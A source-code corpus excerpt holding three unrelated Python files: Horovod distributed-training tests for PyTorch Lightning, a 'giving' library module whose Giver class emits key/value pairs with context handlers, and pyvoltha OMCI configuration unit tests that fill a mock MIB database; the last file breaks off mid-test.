@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
def test_horovod_multi_gpu(tmpdir):
"""Test Horovod with multi-GPU support."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod'
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not APEX_AVAILABLE, reason="test requires apex")
def test_horovod_apex(tmpdir):
"""Test Horovod with multi-GPU support using apex amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='apex',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skip(reason="Skip till Horovod fixes integration with Native torch.cuda.amp")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not NATIVE_AMP_AVAILABLE, reason="test requires torch.cuda.amp")
def test_horovod_amp(tmpdir):
"""Test Horovod with multi-GPU support using native amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='native',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(not torch.cuda.is_available(), reason="test requires GPU machine")
def test_horovod_transfer_batch_to_gpu(tmpdir):
class TestTrainingStepModel(EvalModelTemplate):
def training_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).training_step(batch, *args, **kwargs)
def validation_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).validation_step(batch, *args, **kwargs)
hparams = EvalModelTemplate.get_default_hparams()
model = TestTrainingStepModel(**hparams)
trainer_options = dict(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=1,
deterministic=True,
distributed_backend='horovod'
)
tpipes.run_model_test_without_loggers(trainer_options, model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_multi_optimizer(enable_pl_optimizer, tmpdir):
model = BasicGAN(**EvalModelTemplate.get_default_hparams())
# fit model
trainer = Trainer(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
distributed_backend='horovod',
enable_pl_optimizer=enable_pl_optimizer,
)
result = trainer.fit(model)
assert result == 1, 'model failed to complete'
assert len(trainer.optimizers) == 2
for i, optimizer in enumerate(trainer.optimizers):
assert hasattr(optimizer, 'synchronize'), 'optimizer has not been wrapped into DistributedOptimizer'
def get_model_params(model):
return set([p for p in model.parameters()])
def get_optimizer_params(optimizer):
return set([p for group in optimizer.param_groups for p in group.get('params', [])])
assert get_model_params(model.generator) != get_model_params(model.discriminator)
assert get_model_params(model.generator) == get_optimizer_params(trainer.optimizers[0])
assert get_model_params(model.discriminator) == get_optimizer_params(trainer.optimizers[1])
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_result_reduce_horovod(enable_pl_optimizer, tmpdir):
"""Make sure result logging works with Horovod.
This test mirrors tests/core/test_results.py::_ddp_test_fn
"""
tutils.reset_seed()
tutils.set_random_master_port()
def hvd_test_fn():
path_here = os.path.abspath(os.path.dirname(__file__))
path_root = os.path.abspath(os.path.join(path_here, '..', '..'))
sys.path.insert(0, os.path.abspath(path_root))
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
self.training_step_called = True
tensor = torch.tensor([1.0])
self.log("test_tensor", tensor, sync_dist=True, sync_dist_op='sum',
on_step=True, on_epoch=True)
res = self._results
# Check that `tensor` is summed across all ranks automatically
assert res["test_tensor"].item() == hvd.size(), \
"Result-Log does not work properly with Horovod and Tensors"
def training_epoch_end(self, outputs) -> None:
assert len(outputs) == 0
model = TestModel()
model.val_dataloader = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
enable_pl_optimizer=enable_pl_optimizer,
)
trainer.fit(model)
horovod.run(hvd_test_fn, np=2)
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
def test_accuracy_metric_horovod():
num_batches = 10
batch_size = 16
threshold = 0.5
def sk_metric(preds, target):
sk_preds = (preds.view(-1).numpy() >= threshold).astype(np.uint8)
sk_target = target.view(-1).numpy()
return accuracy_score(y_true=sk_target, y_pred=sk_preds)
preds = torch.rand(num_batches, batch_size)
target = torch.randint(high=2, size=(num_batches, batch_size))
def _compute_batch():
trainer = Trainer(
fast_dev_run=True,
distributed_backend='horovod',
)
accelerator_backend = trainer.accelerator_connector.select_accelerator()
assert isinstance(accelerator_backend, HorovodAccelerator)
metric = Accuracy(compute_on_step=True,
dist_sync_on_step=True,
dist_sync_fn=accelerator_backend.gather_all_tensors,
threshold=threshold)
for i in range(hvd.rank(), num_batches, hvd.size()):
batch_result = metric(preds[i], target[i])
if hvd.rank() == 0:
dist_preds = torch.stack([preds[i + r] for r in range(hvd.size())])
dist_target = torch.stack([target[i + r] for r in range(hvd.size())])
sk_batch_result = sk_metric(dist_preds, dist_target)
assert np.allclose(batch_result.numpy(), sk_batch_result)
# check on all batches on all ranks
result = metric.compute()
assert isinstance(result, torch.Tensor)
total_preds = torch.stack([preds[i] for i in range(num_batches)])
total_target = torch.stack([target[i] for i in range(num_batches)])
sk_result = sk_metric(total_preds, total_target)
assert np.allclose(result.numpy(), sk_result)
horovod.run(_compute_batch, np=2)
# @pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
# def test_horovod_multi_optimizer_with_scheduling_stepping(tmpdir):
# hparams = EvalModelTemplate.get_default_hparams()
# model = EvalModelTemplate(**hparams)
# model.configure_optimizers = model.configure_optimizers__multiple_schedulers
#
# num_workers = 8
# init_lr = hparams.get('learning_rate') * num_workers
#
# with patch('pytorch_lightning.accelerators.horovod_backend.hvd.size') as mock_hvd_size:
# mock_hvd_size.return_value = 8
#
# # fit model
# trainer = Trainer(
# default_root_dir=tmpdir,
# max_epochs=1,
# limit_val_batches=0.5,
# limit_train_batches=0.2,
# distributed_backend='horovod'
# )
# results = trainer.fit(model)
# assert results == 1
#
# adjusted_lr1 = [pg['lr'] for pg in trainer.optimizers[0].param_groups][0]
# adjusted_lr2 = [pg['lr'] for pg in trainer.optimizers[1].param_groups][0]
#
# # Called ones after end of epoch with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr1
#
# # Called every 3 steps, meaning for 1 epoch of 11 batches, it is called 3 times with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr2
|
the-stack_0_3758 | import ast
import sys
import time
from collections import namedtuple
from contextlib import contextmanager
from contextvars import ContextVar
from itertools import count
from varname import ImproperUseError, VarnameRetrievingError, argname, varname
from varname.utils import get_node
global_context = ContextVar("global_context", default=())
global_inherited = ContextVar("global_inherited", default={})
_block_classes = {
ast.If: ("body", "orelse"),
ast.For: ("body", "orelse"),
ast.While: ("body", "orelse"),
ast.FunctionDef: ("body",),
ast.AsyncFunctionDef: ("body",),
ast.With: ("body",),
ast.AsyncWith: ("body",),
ast.AsyncFor: ("body", "orelse"),
}
_improper_nullary_give_error = (
"give() with no arguments must immediately follow an assignment"
)
special_keys = {}
global_count = count(0)
def register_special(key):
"""Return a decorator to register a function for a special key.
The function is called with no arguments whenever the special key is
requested, e.g. with ``Giver(special=["$specialkey"])``.
Use ``sys._getframe(3)`` to get the frame in which give() was called.
Example:
.. code-block:: python
@register_special("$time")
def _special_time():
return time.time()
Arguments:
key: The key, conventionally starting with a "$".
"""
def deco(func):
special_keys[key] = func
return func
return deco
@register_special("$time")
def _special_time():
return time.time()
@register_special("$frame")
def _special_frame():
return sys._getframe(3)
LinePosition = namedtuple("LinePosition", ["name", "filename", "lineno"])
@register_special("$line")
def _special_line():
fr = sys._getframe(3)
co = fr.f_code
return LinePosition(co.co_name, co.co_filename, fr.f_lineno)
def _find_targets(target):
if isinstance(target, ast.Tuple):
results = []
for t in target.elts:
results += _find_targets(t)
return results
else:
return [target.id]
def _find_above(frame):
node = get_node(frame + 1)
if node is None:
raise VarnameRetrievingError(
"Cannot retrieve the node where the function is called"
)
while node.parent is not None:
parent = node.parent
fields = _block_classes.get(type(parent), None)
if fields is None:
node = parent
continue
else:
for field in fields:
f = getattr(parent, field)
if node in f:
idx = f.index(node)
if idx == 0:
raise ImproperUseError(_improper_nullary_give_error)
assignment = f[idx - 1]
if isinstance(assignment, ast.Assign):
target = assignment.targets[-1]
names = _find_targets(target)
elif isinstance(assignment, (ast.AugAssign, ast.AnnAssign)):
names = [assignment.target.id]
else:
raise ImproperUseError(_improper_nullary_give_error)
fr = sys._getframe(frame)
rval = {}
for name in names:
if name in fr.f_locals:
rval[name] = fr.f_locals[name]
elif name in fr.f_globals:
rval[name] = fr.f_globals[name]
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve value")
return rval
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not find node position")
# I am not sure how to trigger this
raise Exception("Could not find node") # pragma: no cover
def resolve(frame, func, args):
"""Return a {variable_name: value} dictionary depending on usage.
* ``len(args) == 0`` => Use the variable assigned in the line before the call.
* ``len(args) == 1`` => Use the variable the call is assigned to.
    * ``len(args) >= 1`` (and not assigned to a single variable) => Use the variables passed as arguments to the call.
Arguments:
frame: The number of frames to go up to find the context.
func: The Giver object that was called.
args: The arguments given to the Giver.
"""
nargs = len(args)
if nargs == 0:
return _find_above(frame=frame + 2)
if nargs == 1:
try:
assigned_to = varname(frame=frame + 1, strict=True, raise_exc=False)
except ImproperUseError:
assigned_to = None
if assigned_to is not None:
return {assigned_to: args[0]}
argnames = argname("args", func=func, frame=frame + 1, vars_only=False)
if argnames is None: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve arg names")
return {name: value for name, value in zip(argnames, args)}
class Giver:
"""Giver of key/value pairs.
``Giver`` is the class of the ``give`` object.
Arguments:
keys:
List of default keys to give. If ``keys=["x"]``, then
``self(123)`` will give ``{"x": 123}``.
special:
List of special keys to give (e.g. "$line", "$time", etc.)
extra:
Extra key/value pairs to give.
context:
The ContextVar that contains a list of handlers to call
when something is given.
inherited:
A ContextVar to use for inherited key/value pairs to give,
as set by ``with self.inherit(key=value): ...``.
transform:
A function from dict to dict that modifies the values to
give.
"""
def __init__(
self,
*,
keys=None,
special=[],
extra={},
context=global_context,
inherited=global_inherited,
transform=None,
):
self.keys = keys
self.special = special
self.extra = extra
self.context = context
self.inherited = inherited
self.transform = transform
def copy(
self,
keys=None,
special=None,
extra=None,
context=None,
inherited=None,
transform=None,
):
"""Copy this Giver with modified parameters."""
return type(self)(
keys=self.keys if keys is None else keys,
special=self.special if special is None else special,
extra=self.extra if extra is None else extra,
context=self.context if context is None else context,
inherited=self.inherited if inherited is None else inherited,
transform=self.transform if transform is None else transform,
)
@property
def line(self):
"""Return a giver that gives the line where it is called."""
return self.copy(special=(*self.special, "$line"))
@property
def time(self):
"""Return a giver that gives the time where it is called."""
return self.copy(special=(*self.special, "$time"))
@contextmanager
def inherit(self, **keys):
"""Create a context manager within which extra values are given.
.. code-block:: python
with give.inherit(a=1):
give(b=2) # gives {"a": 1, "b": 2}
Arguments:
keys: The key/value pairs to give within the block.
"""
inh = self.inherited.get()
token = self.inherited.set({**inh, **keys})
try:
yield
finally:
self.inherited.reset(token)
@contextmanager
def wrap(self, name, **keys):
"""Create a context manager that marks the beginning/end of the block.
``wrap`` first creates a unique ID to identify the block,
then gives the ``$wrap`` sentinel with name, uid and step="begin"
at the beginning of it gives the same ``$wrap`` but with step="end"
at the end of the block.
:meth:`giving.gvn.ObservableProxy.wrap` is the corresponding
method on the ObservableProxy returned by ``given()`` and it
can be used to wrap another context manager on the same block.
:meth:`giving.gvn.ObservableProxy.group_wrap` is another method
that uses the sentinels produced by ``wrap``.
.. code-block:: python
with give.wrap("W", x=1): # gives: {"$wrap": {"name": "W", "step": "begin", "id": ID}, "x": 1}
...
# end block, gives: {"$wrap": {"name": "W", "step": "end", "id": ID}, "x": 1}
Arguments:
name: The name to associate to this wrap block.
keys: Extra key/value pairs to give along with the sentinels.
"""
num = next(global_count)
self.produce({"$wrap": {"name": name, "step": "begin", "id": num}, **keys})
try:
yield
finally:
self.produce({"$wrap": {"name": name, "step": "end", "id": num}, **keys})
@contextmanager
def wrap_inherit(self, name, **keys):
"""Shorthand for using wrap and inherit.
.. code-block:: python
with give.wrap_inherit("W", a=1):
...
Is equivalent to:
.. code-block:: python
with give.inherit(a=1):
with give.wrap("W"):
...
Arguments:
name: The name to associate to this wrap block.
keys: Key/value pairs to inherit.
"""
with self.inherit(**keys):
with self.wrap(name):
yield
def produce(self, values):
"""Give the values dictionary."""
for special in self.special:
values[special] = special_keys[special]()
if self.extra:
values = {**self.extra, **values}
inh = self.inherited.get()
if inh is not None:
values = {**inh, **values}
for handler in self.context.get():
handler(values)
def variant(self, fn):
"""Create a version of give that transforms the data.
.. code-block:: python
@give.variant
def give_image(data):
return {"image": data}
...
give_image(x, y) # gives {"image": {"x": x, "y": y}}
Arguments:
fn: A function from a dict to a dict.
"""
return self.copy(transform=fn)
def __call__(self, *args, **values):
"""Give the args and values."""
h = self.context.get()
if h:
if self.keys:
if len(args) != len(self.keys):
raise ImproperUseError(
f"Giver for {self.keys} must have {len(self.keys)} positional argument(s)."
)
keyed = dict(zip(self.keys, args))
values = {**keyed, **values}
elif args:
values = {**resolve(1, self, args), **values}
elif not values:
values = resolve(1, self, ())
if self.transform:
values = self.transform(values)
self.produce(values)
if len(args) == 1:
return args[0]
else:
return None
def giver(*keys, **extra):
"""Create a Giver to give the specified keys, plus extra values.
.. code-block:: python
g = giver("x", y=1)
        g(3)  # gives {"x": 3, "y": 1}
"""
normal = [k for k in keys if not k.startswith("$")]
special = [k for k in keys if k.startswith("$")]
return Giver(keys=normal, special=special, extra=extra)
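# Illustrative usage sketch (not part of the library; handlers are assumed to be
# registered in the context elsewhere, and all names below are hypothetical):
#
#   give_loss = giver("loss", phase="train")
#   with give_loss.inherit(epoch=0):
#       with give_loss.wrap("step"):
#           give_loss(0.25)  # each registered handler receives
#                            # {"epoch": 0, "phase": "train", "loss": 0.25}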
|
the-stack_0_3759 | #
# Copyright 2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from hashlib import md5
from unittest import TestCase, main
from nose.tools import raises
from nose.twistedtools import deferred
from copy import deepcopy
from .mock.mock_adapter_agent import MockAdapterAgent, MockCore
from .mock.mock_onu_handler import MockOnuHandler
from .mock.mock_olt_handler import MockOltHandler
from .mock.mock_onu import MockOnu
from pyvoltha.adapters.extensions.omci.openomci_agent import OpenOMCIAgent, OpenOmciAgentDefaults
from pyvoltha.adapters.extensions.omci.onu_configuration import OMCCVersion
from pyvoltha.adapters.extensions.omci.omci_defs import *
from pyvoltha.adapters.extensions.omci.omci_entities import OntG, Ont2G, Cardholder, \
CircuitPack, SoftwareImage, AniG, UniG
from pyvoltha.common.utils.asleep import asleep
from pyvoltha.adapters.extensions.omci.database.mib_db_dict import MibDbVolatileDict
from datetime import datetime
DEFAULT_OLT_DEVICE_ID = 'default_olt_mock'
DEFAULT_ONU_DEVICE_ID = 'default_onu_mock'
DEFAULT_PON_ID = 0
DEFAULT_ONU_ID = 0
DEFAULT_ONU_SN = 'TEST00000001'
OP = EntityOperations
RC = ReasonCodes
class TestOmciConfiguration(TestCase):
"""
Test the OMCI read-only Configuration library methods
"""
def setUp(self):
self.adapter_agent = MockAdapterAgent()
custom = deepcopy(OpenOmciAgentDefaults)
custom['mib-synchronizer']['database'] = MibDbVolatileDict
self.omci_agent = OpenOMCIAgent(MockCore, support_classes=custom)
self.omci_agent.start()
def tearDown(self):
if self.omci_agent is not None:
self.omci_agent.stop()
if self.adapter_agent is not None:
self.adapter_agent.tearDown()
def setup_mock_olt(self, device_id=DEFAULT_OLT_DEVICE_ID):
handler = MockOltHandler(self.adapter_agent, device_id)
self.adapter_agent.add_device(handler.device)
return handler
def setup_mock_onu(self, parent_id=DEFAULT_OLT_DEVICE_ID,
device_id=DEFAULT_ONU_DEVICE_ID,
pon_id=DEFAULT_PON_ID,
onu_id=DEFAULT_ONU_ID,
serial_no=DEFAULT_ONU_SN):
handler = MockOnuHandler(self.adapter_agent, parent_id, device_id, pon_id, onu_id)
handler.serial_number = serial_no
onu = MockOnu(serial_no, self.adapter_agent, handler.device_id) \
if serial_no is not None else None
handler.onu_mock = onu
return handler
def setup_one_of_each(self):
        # Most tests will use at least one OLT and one ONU
self.olt_handler = self.setup_mock_olt()
self.onu_handler = self.setup_mock_onu(parent_id=self.olt_handler.device_id)
self.onu_device = self.onu_handler.onu_mock
self.adapter_agent.add_child_device(self.olt_handler.device,
self.onu_handler.device)
# Add device to OpenOMCI
self.onu_device = self.omci_agent.add_device(DEFAULT_ONU_DEVICE_ID,
self.adapter_agent)
# Allow timeout trigger support while in disabled state for mib sync
# to make tests run cleanly while profiling.
self.onu_device.mib_synchronizer.machine.add_transition('timeout', 'disabled', 'disabled')
def not_called(self, _reason):
assert False, 'Should never be called'
def _stuff_database(self, entries):
"""
Stuff the MIB database with some entries that we will use during tests
"""
database = self.onu_device.mib_synchronizer._database
        # Stuff a value into last_mib_db_sync. This makes it look like
        # the ONU has been in-sync at least once.
self.onu_device.mib_synchronizer.last_mib_db_sync = datetime.utcnow()
# Entry is a tuple of (class_id, instance_id, {attributes})
for entry in entries:
database.set(DEFAULT_ONU_DEVICE_ID, entry[0], entry[1], entry[2])
def test_OMCCVersion(self):
for key, value in OMCCVersion.__members__.items():
self.assertEqual(OMCCVersion.to_enum(OMCCVersion[key].value), value)
self.assertEqual(OMCCVersion.to_enum(-1), OMCCVersion.Unknown)
@deferred(timeout=50000)
def test_defaults(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
@raises(AssertionError)
def do_my_tests(_results):
config = self.onu_device.configuration
# Should raise assertion if never been synchronized
config.version
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs. This is a waiting
# Async task from when the OpenOMCIAgent was started. But also start the
# device so that it's queued async state machines can run as well
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_but_empty(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
def stuff_db(_results):
self._stuff_database([])
def do_my_tests(_results):
config = self.onu_device.configuration
            # If the MIB has no entry for the class behind a requested
            # property, None should be returned
self.assertIsNone(config.version)
self.assertIsNone(config.traffic_management_option)
self.assertIsNone(config.onu_survival_time)
self.assertIsNone(config.equipment_id)
self.assertIsNone(config.omcc_version)
self.assertIsNone(config.vendor_product_code)
self.assertIsNone(config.total_priority_queues)
self.assertIsNone(config.total_traffic_schedulers)
self.assertIsNone(config.total_gem_ports)
self.assertIsNone(config.uptime)
self.assertIsNone(config.connectivity_capability)
self.assertIsNone(config.qos_configuration_flexibility)
self.assertIsNone(config.priority_queue_scale_factor)
self.assertIsNone(config.cardholder_entities)
self.assertIsNone(config.circuitpack_entities)
self.assertIsNone(config.software_images)
self.assertIsNone(config.ani_g_entities)
self.assertIsNone(config.uni_g_entities)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
version = 'abcDEF'
tm_opt = 2
onu_survival = 123
def stuff_db(_results):
self._stuff_database([
(OntG.class_id, 0, {'version': version,
'traffic_management_options': tm_opt,
'ont_survival_time': onu_survival
})])
def do_my_tests(_results):
config = self.onu_device.configuration
            # The ONT-G values stuffed into the MIB should be reflected
            # in the configuration
self.assertEqual(config.version, version)
self.assertEqual(config.traffic_management_option, tm_opt)
self.assertEqual(config.onu_survival_time, onu_survival)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ont_2g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
equip_id = 'br-549'
omcc_ver = OMCCVersion.G_988_2012
vend_code = 0x1234
queues = 64
scheds = 8
gem_ports = 24
uptime = 12345
conn_capp = 0x00aa
qos_flex = 0x001b
queue_scale = 1
def stuff_db(_results):
self._stuff_database([
(Ont2G.class_id, 0, {'equipment_id': equip_id,
'omcc_version': omcc_ver.value,
'vendor_product_code': vend_code,
'total_priority_queue_number': queues,
'total_traffic_scheduler_number': scheds,
'total_gem_port_id_number': gem_ports,
'sys_uptime': uptime,
'connectivity_capability': conn_capp,
'qos_configuration_flexibility': qos_flex,
'priority_queue_scale_factor': queue_scale
})])
def do_my_tests(_results):
config = self.onu_device.configuration
self.assertEqual(config.equipment_id, equip_id)
self.assertEqual(config.omcc_version, omcc_ver)
self.assertEqual(config.vendor_product_code, vend_code)
self.assertEqual(config.total_priority_queues, queues)
self.assertEqual(config.total_traffic_schedulers, scheds)
self.assertEqual(config.total_gem_ports, gem_ports)
self.assertEqual(config.uptime, uptime)
self.assertEqual(config.connectivity_capability, conn_capp)
self.assertEqual(config.qos_configuration_flexibility, qos_flex)
self.assertEqual(config.priority_queue_scale_factor, queue_scale)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_cardholder_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
ch_entity = 0x102
unit_type = 255
clie_code = 'abc123'
prot_ptr = 0
def stuff_db(_results):
self._stuff_database([
(Cardholder.class_id, ch_entity, {'actual_plugin_unit_type': unit_type,
'actual_equipment_id': clie_code,
'protection_profile_pointer': prot_ptr,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
cardholder = config.cardholder_entities
self.assertTrue(isinstance(cardholder, dict))
self.assertEqual(len(cardholder), 1)
self.assertEqual(cardholder[ch_entity]['entity-id'], ch_entity)
self.assertEqual(cardholder[ch_entity]['is-single-piece'], ch_entity >= 256)
self.assertEqual(cardholder[ch_entity]['slot-number'], ch_entity & 0xFF)
self.assertEqual(cardholder[ch_entity]['actual-plug-in-type'], unit_type)
self.assertEqual(cardholder[ch_entity]['actual-equipment-id'], clie_code)
self.assertEqual(cardholder[ch_entity]['protection-profile-ptr'], prot_ptr)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_circuitpack_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
cp_entity = 0x100
num_ports = 1
serial_num = 'ABCD01234'
cp_version = '1234ABCD'
vendor_id = 'AB-9876'
tconts = 2
pqueues = 64
sched_count = 8
def stuff_db(_results):
self._stuff_database([
(CircuitPack.class_id, cp_entity, {'number_of_ports': num_ports,
'serial_number': serial_num,
'version': cp_version,
'vendor_id': vendor_id,
'total_tcont_buffer_number': tconts,
'total_priority_queue_number': pqueues,
'total_traffic_scheduler_number': sched_count,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
circuitpack = config.circuitpack_entities
self.assertTrue(isinstance(circuitpack, dict))
self.assertEqual(len(circuitpack), 1)
self.assertEqual(circuitpack[cp_entity]['entity-id'], cp_entity)
self.assertEqual(circuitpack[cp_entity]['number-of-ports'], num_ports)
self.assertEqual(circuitpack[cp_entity]['serial-number'], serial_num)
self.assertEqual(circuitpack[cp_entity]['version'], cp_version)
self.assertEqual(circuitpack[cp_entity]['vendor-id'], vendor_id)
self.assertEqual(circuitpack[cp_entity]['total-tcont-count'], tconts)
self.assertEqual(circuitpack[cp_entity]['total-priority-queue-count'], pqueues)
self.assertEqual(circuitpack[cp_entity]['total-traffic-sched-count'], sched_count)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_software_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
sw_entity = 0x200
sw_version = 'Beta-0.0.2'
        sw_hash = md5(b"just_a_test").hexdigest()
prod_code = 'MySoftware'
sw_active = True
sw_committed = True
sw_valid = True
def stuff_db(_results):
self._stuff_database([
(SoftwareImage.class_id, sw_entity, {'version': sw_version,
'is_committed': sw_committed,
'is_active': sw_active,
'is_valid': sw_valid,
'product_code': prod_code,
'image_hash': sw_hash,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
images = config.software_images
self.assertTrue(isinstance(images, list))
self.assertEqual(len(images), 1)
self.assertEqual(images[0].name, 'running-revision' if sw_active else 'candidate-revision')
self.assertEqual(images[0].version, sw_version)
self.assertEqual(images[0].is_active, 1 if sw_active else 0)
self.assertEqual(images[0].is_committed, 1 if sw_committed else 0)
self.assertEqual(images[0].is_valid, 1 if sw_valid else 0)
self.assertEqual(images[0].hash, sw_hash)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ani_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x0106
tconts = 4
dba_report = 4
def stuff_db(_results):
self._stuff_database([
(AniG.class_id, entity_id, {'total_tcont_number': tconts,
'piggyback_dba_reporting': dba_report
})
])
def do_my_tests(_results):
config = self.onu_device.configuration
anig = config.ani_g_entities
self.assertTrue(isinstance(anig, dict))
self.assertEqual(len(anig), 1)
self.assertEqual(anig[entity_id]['entity-id'], entity_id)
self.assertEqual(anig[entity_id]['slot-number'], (entity_id >> 8) & 0xff)
self.assertEqual(anig[entity_id]['port-number'], entity_id & 0xff)
self.assertEqual(anig[entity_id]['total-tcont-count'], tconts)
self.assertEqual(anig[entity_id]['piggyback-dba-reporting'], dba_report)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_uni_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x4321
mgmt_cap = 0
def stuff_db(_results):
self._stuff_database([
(UniG.class_id, entity_id, {'management_capability': mgmt_cap})
])
def do_my_tests(_results):
config = self.onu_device.configuration
unig = config.uni_g_entities
self.assertTrue(isinstance(unig, dict))
self.assertEqual(len(unig), 1)
self.assertEqual(unig[entity_id]['entity-id'], entity_id)
self.assertEqual(unig[entity_id]['management-capability'], mgmt_cap)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
